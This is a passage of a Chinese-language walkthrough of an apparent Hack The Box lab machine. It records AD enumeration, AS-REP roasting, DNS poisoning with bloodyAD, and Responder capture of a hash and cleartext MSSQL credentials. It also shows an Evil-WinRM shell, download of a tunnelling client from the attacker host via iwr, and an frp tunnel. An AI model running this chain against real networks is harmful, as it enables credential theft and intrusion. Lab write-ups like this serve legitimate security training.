SMB         10.129.6.144    445    S200401          krbtgt                        2025-05-17 00:08:45 0       Key Distribution Center Service Account 
SMB         10.129.6.144    445    S200401          sqlsvc                        2025-05-17 00:47:43 0        
SMB         10.129.6.144    445    S200401          sqlmgmt                       2025-05-17 01:24:21 0        
SMB         10.129.6.144    445    S200401          Charlie.Moss                  2025-05-17 03:05:41 0        
SMB         10.129.6.144    445    S200401          Tracy.Burns                   2025-05-17 03:05:41 0        
SMB         10.129.6.144    445    S200401          Kathryn.Bryan                 2025-05-17 03:05:41 0        
SMB         10.129.6.144    445    S200401          Rachael.Thomas                2025-05-17 03:05:41 0        
SMB         10.129.6.144    445    S200401          Aimee.Smith                   2025-05-17 03:05:41 0        
SMB         10.129.6.144    445    S200401          Duncan.Freeman                2025-05-17 03:05:41 0        
SMB         10.129.6.144    445    S200401          John.Begum                    2025-05-17 03:05:42 0        
SMB         10.129.6.144    445    S200401          Bernard.Hilton                2025-05-17 03:05:42 0        
SMB         10.129.6.144    445    S200401          Kim.Hargreaves                2025-05-17 03:05:42 0        
SMB         10.129.6.144    445    S200401          Douglas.Burrows               2025-05-17 03:05:42 0        
SMB         10.129.6.144    445    S200401          Carole.Murray                 2025-05-17 03:05:42 0        
SMB         10.129.6.144    445    S200401          Olivia.Quinn                  2025-05-17 03:05:42 0        
SMB         10.129.6.144    445    S200401          Trevor.Baker                  2025-05-17 03:05:42 0        
SMB         10.129.6.144    445    S200401          Kenneth.Dennis                2025-05-17 03:05:42 0        
SMB         10.129.6.144    445    S200401          Jeremy.Marshall               2025-05-17 03:05:43 0        
SMB         10.129.6.144    445    S200401          Jodie.Jones                   2025-05-17 03:05:43 0        
SMB         10.129.6.144    445    S200401          Thomas.Lee                    2025-05-17 03:05:43 0        
SMB         10.129.6.144    445    S200401          Terence.Matthews              2025-05-17 03:05:43 0        
SMB         10.129.6.144    445    S200401          Colin.Roberts                 2025-05-17 03:05:43 0        
SMB         10.129.6.144    445    S200401          Aaron.Robinson                2025-05-17 03:05:43 0        
SMB         10.129.6.144    445    S200401          Amanda.Jenkins                2025-05-17 03:05:44 0        
SMB         10.129.6.144    445    S200401          Debra.Arnold                  2025-05-17 03:05:44 0        
SMB         10.129.6.144    445    S200401          Michelle.Willis               2025-05-17 03:05:44 0        
SMB         10.129.6.144    445    S200401          Kayleigh.Jones                2025-05-17 03:05:44 0        
SMB         10.129.6.144    445    S200401          Adam.Russell                  2025-05-17 03:05:44 0        
SMB         10.129.6.144    445    S200401          Tracey.Kelly                  2025-05-17 03:05:44 0        
SMB         10.129.6.144    445    S200401          Bethan.Dale                   2025-05-17 03:05:44 0        
SMB         10.129.6.144    445    S200401          Mandy.Wood                    2025-05-17 03:05:44 0        
SMB         10.129.6.144    445    S200401          Jenna.Phillips                2025-05-17 03:05:45 0        
SMB         10.129.6.144    445    S200401          Carole.Yates                  2025-05-17 03:05:45 0        
SMB         10.129.6.144    445    S200401          Graham.Perry                  2025-05-17 03:05:45 0        
SMB         10.129.6.144    445    S200401          Catherine.Griffiths           2025-05-17 03:05:45 0        
SMB         10.129.6.144    445    S200401          Shaun.Jackson                 2025-05-17 03:05:45 0        
SMB         10.129.6.144    445    S200401          Bethan.Rogers                 2025-05-17 03:05:45 0        
SMB         10.129.6.144    445    S200401          Ellie.Singh                   2025-05-17 03:05:45 0        
SMB         10.129.6.144    445    S200401          Marie.Allan                   2025-05-17 03:05:46 0        
SMB         10.129.6.144    445    S200401          Patrick.Holmes                2025-05-17 03:05:46 0        
SMB         10.129.6.144    445    S200401          Victor.Hopkins                2025-05-17 03:05:46 0        
SMB         10.129.6.144    445    S200401          Geraldine.Harper              2025-05-17 03:05:46 0        
SMB         10.129.6.144    445    S200401          George.Todd                   2025-05-17 03:05:46 0        
SMB         10.129.6.144    445    S200401          Karl.Smith                    2025-05-17 03:05:46 0        
SMB         10.129.6.144    445    S200401          Jacqueline.Norton             2025-05-17 03:05:46 0        
SMB         10.129.6.144    445    S200401          Frederick.Murray              2025-05-17 03:05:46 0        
SMB         10.129.6.144    445    S200401          Joe.Pearce                    2025-05-17 03:05:47 0        
SMB         10.129.6.144    445    S200401          Paul.Collins                  2025-05-17 03:05:47 0        
SMB         10.129.6.144    445    S200401          Damien.Edwards                2025-05-17 03:05:47 0        
SMB         10.129.6.144    445    S200401          Eileen.Phillips               2025-05-17 03:05:47 0        
SMB         10.129.6.144    445    S200401          Carl.Johnson                  2025-05-17 03:05:47 0        
SMB         10.129.6.144    445    S200401          Kevin.Newton                  2025-05-17 03:05:47 0        
SMB         10.129.6.144    445    S200401          Natalie.Higgins               2025-05-17 03:05:47 0        
SMB         10.129.6.144    445    S200401          Francis.Weston                2025-05-17 03:05:48 0        
SMB         10.129.6.144    445    S200401          Benjamin.Davison              2025-05-17 03:05:48 0        
SMB         10.129.6.144    445    S200401          Martin.Kemp                   2025-05-17 03:05:48 0        
SMB         10.129.6.144    445    S200401          Angela.Jones                  2025-05-17 03:05:48 0        
SMB         10.129.6.144    445    S200401          Gareth.Ahmed                  2025-05-17 03:05:48 0        
SMB         10.129.6.144    445    S200401          Deborah.Morgan                2025-05-17 03:05:48 0        
SMB         10.129.6.144    445    S200401          Grace.Taylor                  2025-05-17 03:05:48 0        
SMB         10.129.6.144    445    S200401          Roger.Hughes                  2025-05-17 03:05:48 0        
SMB         10.129.6.144    445    S200401          Albert.Barrett                2025-05-17 03:05:49 0        
SMB         10.129.6.144    445    S200401          Grace.Curtis                  2025-05-17 03:05:49 0        
SMB         10.129.6.144    445    S200401          Marilyn.Griffiths             2025-05-17 03:05:49 0        
SMB         10.129.6.144    445    S200401          Tracey.Barker                 2025-05-17 03:05:49 0        
SMB         10.129.6.144    445    S200401          Suzanne.Hughes                2025-05-17 03:05:49 0        
SMB         10.129.6.144    445    S200401          Timothy.Jackson               2025-05-17 03:05:49 0        
SMB         10.129.6.144    445    S200401          Beverley.Thompson             2025-05-17 03:05:49 0        
SMB         10.129.6.144    445    S200401          Clare.Bartlett                2025-05-17 03:05:50 0        
SMB         10.129.6.144    445    S200401          Irene.Johnson                 2025-05-17 03:05:50 0        
SMB         10.129.6.144    445    S200401          Bernard.Wood                  2025-05-17 03:05:50 0        
SMB         10.129.6.144    445    S200401          Frank.McCarthy                2025-05-17 03:05:50 0        
SMB         10.129.6.144    445    S200401          Elaine.Page                   2025-05-17 03:05:50 0        
SMB         10.129.6.144    445    S200401          Elaine.Walker                 2025-05-17 03:05:50 0        
SMB         10.129.6.144    445    S200401          Mohammad.Hill                 2025-05-17 03:05:50 0        
SMB         10.129.6.144    445    S200401          Glenn.Field                   2025-05-17 03:05:50 0        
SMB         10.129.6.144    445    S200401          Deborah.Martin                2025-05-17 03:05:51 0        
SMB         10.129.6.144    445    S200401          Gail.Sullivan                 2025-05-17 03:05:51 0        
SMB         10.129.6.144    445    S200401          Maureen.Kirby                 2025-05-17 03:05:51 0        
SMB         10.129.6.144    445    S200401          Georgina.Chambers             2025-05-17 03:05:51 0        
SMB         10.129.6.144    445    S200401          Philip.Harris                 2025-05-17 03:05:51 0        
SMB         10.129.6.144    445    S200401          Samantha.Scott                2025-05-17 03:05:51 0        
SMB         10.129.6.144    445    S200401          Ann.Hill                      2025-05-17 03:05:51 0        
SMB         10.129.6.144    445    S200401          Chloe.Cox                     2025-05-17 03:05:51 0        
SMB         10.129.6.144    445    S200401          Jamie.Gough                   2025-05-17 03:05:52 0        
SMB         10.129.6.144    445    S200401          Frederick.Hussain             2025-05-17 03:05:52 0        
SMB         10.129.6.144    445    S200401          Dean.Hobbs                    2025-05-17 03:05:52 0        
SMB         10.129.6.144    445    S200401          Danielle.Moore                2025-05-17 03:05:52 0        
SMB         10.129.6.144    445    S200401          Timothy.Smith                 2025-05-17 03:05:52 0        
SMB         10.129.6.144    445    S200401          Declan.Stone                  2025-05-17 03:05:52 0        
SMB         10.129.6.144    445    S200401          Jacob.Wilson                  2025-05-17 03:05:52 0        
SMB         10.129.6.144    445    S200401          Gary.Elliott                  2025-05-17 03:05:52 0        
SMB         10.129.6.144    445    S200401          Peter.Slater                  2025-05-17 03:05:53 0        
SMB         10.129.6.144    445    S200401          Louise.Walton                 2025-05-17 03:05:53 0        
SMB         10.129.6.144    445    S200401          Brett.Haynes                  2025-05-17 03:05:53 0        
SMB         10.129.6.144    445    S200401          Elliot.Green                  2025-05-17 03:05:53 0        
SMB         10.129.6.144    445    S200401          Wendy.Williams                2025-05-17 03:05:53 0        
SMB         10.129.6.144    445    S200401          Graham.Parker                 2025-05-17 03:05:53 0        
SMB         10.129.6.144    445    S200401          Abdul.Stevens                 2025-05-17 03:05:53 0        
SMB         10.129.6.144    445    S200401          Brett.Bailey                  2025-05-17 03:05:54 0        
SMB         10.129.6.144    445    S200401          Benjamin.Harrison             2025-05-17 03:05:54 0        
SMB         10.129.6.144    445    S200401          Emily.Cooper                  2025-05-17 03:05:54 0        
SMB         10.129.6.144    445    S200401          Roger.Spencer                 2025-05-17 03:05:54 0        
SMB         10.129.6.144    445    S200401          [*] Enumerated 105 local users: OVERWATCH

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nxc winrm 10.129.6.144 -u "sqlsvc" -p "TI0LKcfHzZw1Vv"    
WINRM       10.129.6.144    5985   S200401          [*] Windows Server 2022 Build 20348 (name:S200401) (domain:overwatch.htb) 
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       10.129.6.144    5985   S200401          [-] overwatch.htb\sqlsvc:TI0LKcfHzZw1Vv

该组凭据无法直接evilwinrm到靶机，应从枚举出来的用户入手。

AS-REP Roasting攻击

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# impacket-GetNPUsers -usersfile users.txt -no-pass -dc-ip 10.129.6.144 overwatch.htb/
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Guest doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User sqlsvc doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User sqlmgmt doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Charlie.Moss doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Tracy.Burns doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Kathryn.Bryan doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Rachael.Thomas doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Aimee.Smith doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Duncan.Freeman doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User John.Begum doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Bernard.Hilton doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Kim.Hargreaves doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Douglas.Burrows doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Carole.Murray doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Olivia.Quinn doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Trevor.Baker doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Kenneth.Dennis doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Jeremy.Marshall doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Jodie.Jones doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Thomas.Lee doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Terence.Matthews doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Colin.Roberts doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Aaron.Robinson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Amanda.Jenkins doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Debra.Arnold doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Michelle.Willis doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Kayleigh.Jones doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Adam.Russell doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Tracey.Kelly doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Bethan.Dale doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Mandy.Wood doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Jenna.Phillips doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Carole.Yates doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Graham.Perry doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Catherine.Griffiths doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Shaun.Jackson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Bethan.Rogers doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Ellie.Singh doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Marie.Allan doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Patrick.Holmes doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Victor.Hopkins doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Geraldine.Harper doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User George.Todd doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Karl.Smith doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Jacqueline.Norton doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Frederick.Murray doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Joe.Pearce doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Paul.Collins doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Damien.Edwards doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Eileen.Phillips doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Carl.Johnson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Kevin.Newton doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Natalie.Higgins doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Francis.Weston doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Benjamin.Davison doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Martin.Kemp doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Angela.Jones doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Gareth.Ahmed doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Deborah.Morgan doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Grace.Taylor doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Roger.Hughes doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Albert.Barrett doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Grace.Curtis doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Marilyn.Griffiths doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Tracey.Barker doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Suzanne.Hughes doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Timothy.Jackson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Beverley.Thompson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Clare.Bartlett doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Irene.Johnson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Bernard.Wood doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Frank.McCarthy doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Elaine.Page doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Elaine.Walker doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Mohammad.Hill doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Glenn.Field doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Deborah.Martin doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Gail.Sullivan doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Maureen.Kirby doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Georgina.Chambers doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Philip.Harris doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Samantha.Scott doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Ann.Hill doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Chloe.Cox doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Jamie.Gough doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Frederick.Hussain doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Dean.Hobbs doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Danielle.Moore doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Timothy.Smith doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Declan.Stone doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Jacob.Wilson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Gary.Elliott doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Peter.Slater doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Louise.Walton doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Brett.Haynes doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Elliot.Green doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Wendy.Williams doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Graham.Parker doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Abdul.Stevens doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Brett.Bailey doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Benjamin.Harrison doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Emily.Cooper doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Roger.Spencer doesn't have UF_DONT_REQUIRE_PREAUTH set

攻击无果，退一步，想到用该组数据库凭据登录数据库。

前面的端口扫描中发现，6520开放mssql服务。

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# impacket-mssqlclient overwatch.htb/sqlsvc:"TI0LKcfHzZw1Vv"@10.129.6.144 -port 6520 -windows-auth
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(S200401\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(S200401\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server 2022 RTM (16.0.1000)
[!] Press help for extra shell commands
SQL (OVERWATCH\sqlsvc  guest@master)> 

尝试开启xp_cmdshell,失败

SQL (OVERWATCH\sqlsvc  guest@master)> enable_xp_cmdshell
ERROR(S200401\SQLEXPRESS): Line 105: User does not have permission to perform this action.
ERROR(S200401\SQLEXPRESS): Line 1: You do not have permission to run the RECONFIGURE statement.
ERROR(S200401\SQLEXPRESS): Line 62: The configuration option 'xp_cmdshell' does not exist, or it may be an advanced option.
ERROR(S200401\SQLEXPRESS): Line 1: You do not have permission to run the RECONFIGURE statement.
SQL (OVERWATCH\sqlsvc  guest@master)> 

枚举链接的dns服务

SQL (OVERWATCH\sqlsvc  guest@master)> enum_links
SRV_NAME             SRV_PROVIDERNAME   SRV_PRODUCT   SRV_DATASOURCE       SRV_PROVIDERSTRING   SRV_LOCATION   SRV_CAT   
------------------   ----------------   -----------   ------------------   ------------------   ------------   -------   
S200401\SQLEXPRESS   SQLNCLI            SQL Server    S200401\SQLEXPRESS   NULL                 NULL           NULL      
SQL07                SQLNCLI            SQL Server    SQL07                NULL                 NULL           NULL      
Linked Server   Local Login   Is Self Mapping   Remote Login   
-------------   -----------   ---------------   ------------   

发现了另一台主机SQL07，尝试登录失败，提示连接超时。

SQL (OVERWATCH\sqlsvc  guest@master)> SELECT * FROM OPENQUERY("SQL07", 'select SYSTEM_USER');
INFO(S200401\SQLEXPRESS): Line 1: OLE DB provider "MSOLEDBSQL" for linked server "SQL07" returned message "Login timeout expired".
INFO(S200401\SQLEXPRESS): Line 1: OLE DB provider "MSOLEDBSQL" for linked server "SQL07" returned message "A network-related or instance-specific error has occurred while establishing a connection to SQL Server. Server is not found or not accessible. Check if instance name is correct and if SQL Server is configured to allow remote connections. For more information see SQL Server Books Online.".
ERROR(MSOLEDBSQL): Line 0: Named Pipes Provider: Could not open a connection to SQL Server [64]. 
SQL (OVERWATCH\sqlsvc  guest@master)> 

这里卡了很久，翻了其他师傅的wp才发现可以用responder进行中继攻击（所以你的goad都学到狗脑子里去了）

ADIDNS 投毒：在 Windows 域中，默认允许任何已认证用户在 Active Directory 集成的 DNS 中创建记录。你利用 bloodyAD 工具将 SQL07 指向你的攻击机 IP (10.10.15.114)。

认证诱导：当你在主服务器（S200401）执行 use_link [SQL07] 或 xp_dirtree 时，主服务器会根据 DNS 解析结果尝试连接你的 Kali。

凭据泄露（对比原文）：通常 Responder 捕获的是 NTLMv2 哈希，但在你的实验中，由于 SQL07 的链接服务器配置中可能使用了“使用此上下文安全连接”或硬编码了登录映射，Responder 成功捕获到了 明文密码：sqlmgmt:bIhBbzMMnB82yx。这比哈希破解更高效，直接换取了 sqlmgmt 的 WinRM 登录权限。

先用我们获得的数据库登录凭证向域管内添加恶意dns记录

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# bloodyAD -d overwatch.htb -u sqlsvc -p "TI0LKcfHzZw1Vv" --dc-ip 10.129.6.144 add dnsRecord sql07 "10.10.15.114"
[+] sql07 has been successfully added

ping一下确保添加成功

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# ping SQL07.overwatch.htb
PING SQL07.overwatch.htb (198.18.0.19) 56(84) bytes of data.
64 bytes from 198.18.0.19: icmp_seq=1 ttl=64 time=0.462 ms
64 bytes from 198.18.0.19: icmp_seq=2 ttl=64 time=0.640 ms
64 bytes from 198.18.0.19: icmp_seq=3 ttl=64 time=0.388 ms
64 bytes from 198.18.0.19: icmp_seq=4 ttl=64 time=0.216 ms
^C
--- SQL07.overwatch.htb ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3041ms
rtt min/avg/max/mdev = 0.216/0.426/0.640/0.152 ms

之后用responder启动监听（记得把防火墙都给关了）

在数据库内执行use_link [SQL07]命令

[SMB] NTLMv2-SSP Client   : 10.129.6.144
[SMB] NTLMv2-SSP Username : OVERWATCH\S200401$
[SMB] NTLMv2-SSP Hash     : S200401$::OVERWATCH:a4c91d5ad446f2e7:6C8765D70B0E583AFD8E2AE4EFCFB71B:0101000000000000801BC4B8B3AADC01E8F195A9970EA9110000000002000800530048003700560001001E00570049004E002D0059003100300033005A0032003800330053003500460004003400570049004E002D0059003100300033005A003200380033005300350046002E0053004800370056002E004C004F00430041004C000300140053004800370056002E004C004F00430041004C000500140053004800370056002E004C004F00430041004C0007000800801BC4B8B3AADC010600040002000000080030003000000000000000000000000030000013F9219A578CB600B95C320A0A143BDDF5DB6DFED94CC1CABE95CC7F390C65B80A001000000000000000000000000000000000000900140063006900660073002F00530051004C00300037000000000000000000                                                                         
[MSSQL] Cleartext Client   : 10.129.6.144
[MSSQL] Cleartext Hostname : SQL07 ()
[MSSQL] Cleartext Username : sqlmgmt
[MSSQL] Cleartext Password : bIhBbzMMnB82yx

sqlmgmt：bIhBbzMMnB82yx

该组凭据拥有远程登录权限

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nxc winrm 10.129.6.144 -u "sqlmgmt" -p "bIhBbzMMnB82yx"
WINRM       10.129.6.144    5985   S200401          [*] Windows Server 2022 Build 20348 (name:S200401) (domain:overwatch.htb) 
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       10.129.6.144    5985   S200401          [+] overwatch.htb\sqlmgmt:bIhBbzMMnB82yx (Pwn3d!)

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# evil-winrm -i 10.129.6.144 -u "sqlmgmt" -p "bIhBbzMMnB82yx"
                                        
Evil-WinRM shell v3.9
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\sqlmgmt\Documents> dir
*Evil-WinRM* PS C:\Users\sqlmgmt\Documents> cd ..
*Evil-WinRM* PS C:\Users\sqlmgmt> cd Desktop
*Evil-WinRM* PS C:\Users\sqlmgmt\Desktop> dir


    Directory: C:\Users\sqlmgmt\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-ar---          3/2/2026   9:47 PM             34 user.txt


*Evil-WinRM* PS C:\Users\sqlmgmt\Desktop> type user.txt

之前的配置文件中有提到，内网开放了overwatch服务的8000端口，且拥有目录MonitorService，那么使用frp搭建代理将端口转发到kali本地的8000端口。

┌──(root㉿kaada)-[/opt/frp_0.67.0_linux_amd64]
└─# cat frps.toml 
bindPort = 7000
                                                                                                                                                           
┌──(root㉿kaada)-[/opt/frp_0.67.0_linux_amd64]
└─# ./frps -c frps.toml
2026-03-03 02:25:58.025 [I] [frps/root.go:115] frps uses config file: frps.toml
2026-03-03 02:25:58.056 [I] [server/service.go:248] frps tcp listen on 0.0.0.0:7000                                                                        
2026-03-03 02:25:58.056 [I] [frps/root.go:124] frps started successfully                                                                                                                                                               

之后使用iwr下载编辑好的受控端文件，并启动连接。

*Evil-WinRM* PS C:\Users\sqlmgmt\Desktop> powershell -c "iwr -Uri http://10.10.15.114/frpc.exe -OutFile frpc.exe"
*Evil-WinRM* PS C:\Users\sqlmgmt\Desktop> powershell -c "iwr -Uri http://10.10.15.114/frpc.toml -OutFile frpc.toml"

*Evil-WinRM* PS C:\Users\sqlmgmt\Desktop> .\frpc.exe -c frpc.toml
2026-03-02 23:29:20.081 [I] [sub/root.go:159] start frpc service for config file [frpc.toml]
2026-03-02 23:29:20.082 [I] [client/service.go:335] try to connect to server...
2026-03-02 23:29:20.498 [I] [client/service.go:327] [27561a409d4f6fc9] login to server success, get run id [27561a409d4f6fc9]                              
2026-03-02 23:29:20.498 [I] [proxy/proxy_manager.go:180] [27561a409d4f6fc9] proxy added: [intranet_8000]                                                   
2026-03-02 23:29:20.614 [I] [client/control.go:172] [27561a409d4f6fc9] [intranet_8000] start proxy success   

┌──(root㉿kaada)-[/opt/frp_0.67.0_linux_amd64]
└─# ./frps -c frps.toml
2026-03-03 02:25:58.025 [I] [frps/root.go:115] frps uses config file: frps.toml
2026-03-03 02:25:58.056 [I] [server/service.go:248] frps tcp listen on 0.0.0.0:7000                                                                        
2026-03-03 02:25:58.056 [I] [frps/root.go:124] frps started successfully                                                                                   
2026-03-03 02:29:19.458 [I] [server/service.go:597] [27561a409d4f6fc9] client login info: ip [10.129.6.144:59306] version [0.67.0] hostname [S200401] os [windows] arch [amd64]                                                                                                                                       
2026-03-03 02:29:19.624 [I] [proxy/tcp.go:82] [27561a409d4f6fc9] [intranet_8000] tcp proxy listen port [8000]                                              
2026-03-03 02:29:19.624 [I] [server/control.go:407] [27561a409d4f6fc9] new proxy [intranet_8000] type [tcp] success 

已经成功连接了。

接下来访问http://127.0.0.1:8000/MonitorService

┌──(root㉿kaada)-[/opt/frp_0.67.0_windows_amd64]
└─# curl http://127.0.0.1:8000/MonitorService
<HTML lang="en"><HEAD><link rel="alternate" type="text/xml" href="http://overwatch.htb:8000/MonitorService?disco"/><STYLE type="text/css">#content{ FONT-SIZE: 0.7em; PADDING-BOTTOM: 2em; MARGIN-LEFT: 30px}BODY{MARGIN-TOP: 0px; MARGIN-LEFT: 0px; COLOR: #000000; FONT-FAMILY: Verdana; BACKGROUND-COLOR: white}P{MARGIN-TOP: 0px; MARGIN-BOTTOM: 12px; COLOR: #000000; FONT-FAMILY: Verdana}PRE{BORDER-RIGHT: #f0f0e0 1px solid; PADDING-RIGHT: 5px; BORDER-TOP: #f0f0e0 1px solid; MARGIN-TOP: -5px; PADDING-LEFT: 5px; FONT-SIZE: 1.2em; PADDING-BOTTOM: 5px; BORDER-LEFT: #f0f0e0 1px solid; PADDING-TOP: 5px; BORDER-BOTTOM: #f0f0e0 1px solid; FONT-FAMILY: Courier New; BACKGROUND-COLOR: #e5e5cc}.heading1{MARGIN-TOP: 0px; PADDING-LEFT: 15px; FONT-WEIGHT: normal; FONT-SIZE: 26px; MARGIN-BOTTOM: 0px; PADDING-BOTTOM: 3px; MARGIN-LEFT: -30px; WIDTH: 100%; COLOR: #ffffff; PADDING-TOP: 10px; FONT-FAMILY: Tahoma; BACKGROUND-COLOR: #003366}.intro{display: block; font-size: 1em;}</STYLE><TITLE>MonitoringService Service</TITLE></HEAD><BODY><DIV id="content" role="main"><h1 class="heading1">MonitoringService Service</h1><BR/><P class="intro">You have created a service.<P class='intro'>To test this service, you will need to create a client and use it to call the service. You can do this using the svcutil.exe tool from the command line with the following syntax:</P> <BR/><PRE>svcutil.exe <A 